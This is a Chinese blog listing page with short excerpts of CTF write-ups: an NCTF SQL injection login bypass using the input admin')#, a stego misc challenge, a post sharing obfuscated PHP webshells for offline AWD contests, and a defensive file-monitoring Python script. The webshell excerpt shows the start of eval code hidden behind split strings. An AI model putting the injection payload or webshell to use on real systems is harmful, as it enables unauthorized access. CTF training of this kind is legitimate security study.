网络安全
关注
分享
扫一扫
1cePeak
为年少吹过的牛逼而努力
展开
-
NCTF-南邮网络攻防平台WriteUp:SQL注入1
****************蒟蒻萌新拿一血****************SQL注入1传送门:http://chinalover.sinaapp.com/index.php先看源码划重点(敲黑板题目要求输入user,password,我们要避开密码的验证,可以构造语句,在输入user的时候把后面的password用#注释掉。输入 admin‘)# 因...原创 2018-03-30 10:19:43 · 1401 阅读 · 0 评论 -
CTF-实验吧Writeup-Misc类(持续更新)
终于想起来更新实验吧STEGA的Writeup了(手动滑稽1.欢迎来到地狱 解压欢迎来到地狱.zip,看到三个文件。 尝试打开地狱伊始.jpg文件,当然打不开,走不完的是出题人的套路~ 图片无法正常显示。 丢进winhex看看,少了jpg文件头,我们将jpg文件头FF D8 FF E0 插入。 保存后即可正常打开图片。 有一个百度云的...原创 2018-09-06 20:51:14 · 1856 阅读 · 1 评论 -
CTF-线下AWD-PHP大马
分享几个php大马 <?php $GLOBALS['pass'] = "6d31b7d21395a26b8035fdd7b94bb070d5993de3";$func="cr"/*-/-*/."eat"./*-/-*/"e_fun"/*-/-*/."cti"/*-/-*/."on";$xbyte=$func/*-/-*/('$x','ev'/*-/-*/.'al'/原创 2018-11-08 21:10:18 · 281824 阅读 · 7 评论 -
CTF-线下AWD-py脚本
文件监控脚本 # -*- coding: utf-8 -*-#use: python file_check.py ./import osimport hashlibimport shutilimport ntpathimport timeCWD = os.getcwd()FILE_MD5_DICT = {} # 文件MD5字典ORIGIN_FILE_LIS...原创 2018-11-08 21:27:39 · 1544 阅读 · 0 评论